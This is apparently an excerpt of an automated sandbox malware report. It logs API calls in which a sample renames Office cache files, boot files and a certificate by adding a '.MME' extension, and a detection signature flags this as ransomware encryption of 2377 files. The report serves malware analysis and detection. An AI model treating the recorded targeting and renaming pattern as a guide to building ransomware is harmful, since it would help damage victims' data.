MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PubLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-001B-0412-0000-0000000FF1CE}-C\WordMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\OWOW64LR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME32.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlookMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.en\Proof.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proofing.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\BOOTSECT.BAK.MME flags: 2 oldfilepath_r: \\?\M:\BOOTSECT.BAK newfilepath: M:\BOOTSECT.BAK.MME oldfilepath: M:\BOOTSECT.BAK	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\Proof.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC newfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC.MME oldfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ID_00030.DPC	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi newfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\EnterpriseWW.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi newfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-002C-0412-0000-0000000FF1CE}-C\Proof.ko\IME64.msi	1	1

Appends a new file extension or content to 2377 files indicative of a ransomware file encryption process (50 out of 2377 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms flags: 2 oldfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHU3YAY00VEHOD5VG9YY.temp newfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms oldfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHU3YAY00VEHOD5VG9YY.temp	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BCD.LOG1.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BCD.LOG1 newfilepath: M:\Boot\BCD.LOG1.MME oldfilepath: M:\Boot\BCD.LOG1	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BOOTSTAT.DAT.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BOOTSTAT.DAT newfilepath: M:\Boot\BOOTSTAT.DAT.MME oldfilepath: M:\Boot\BOOTSTAT.DAT	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\cuckoo_2552.ini.MME flags: 2 oldfilepath_r: \\?\C:\cuckoo_2552.ini newfilepath: C:\cuckoo_2552.ini.MME oldfilepath: C:\cuckoo_2552.ini	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BCD.LOG2.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BCD.LOG2 newfilepath: M:\Boot\BCD.LOG2.MME oldfilepath: M:\Boot\BCD.LOG2	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\GPKI\gpki.cer.MME flags: 2 oldfilepath_r: \\?\C:\GPKI\gpki.cer newfilepath: C:\GPKI\gpki.cer.MME oldfilepath: C:\GPKI\gpki.cer	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\ExcelMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab newfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-001A-0412-0000-0000000FF1CE}-C\OutlkLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0019-0412-0000-0000000FF1CE}-C\PublisherMUI.xml	1	1
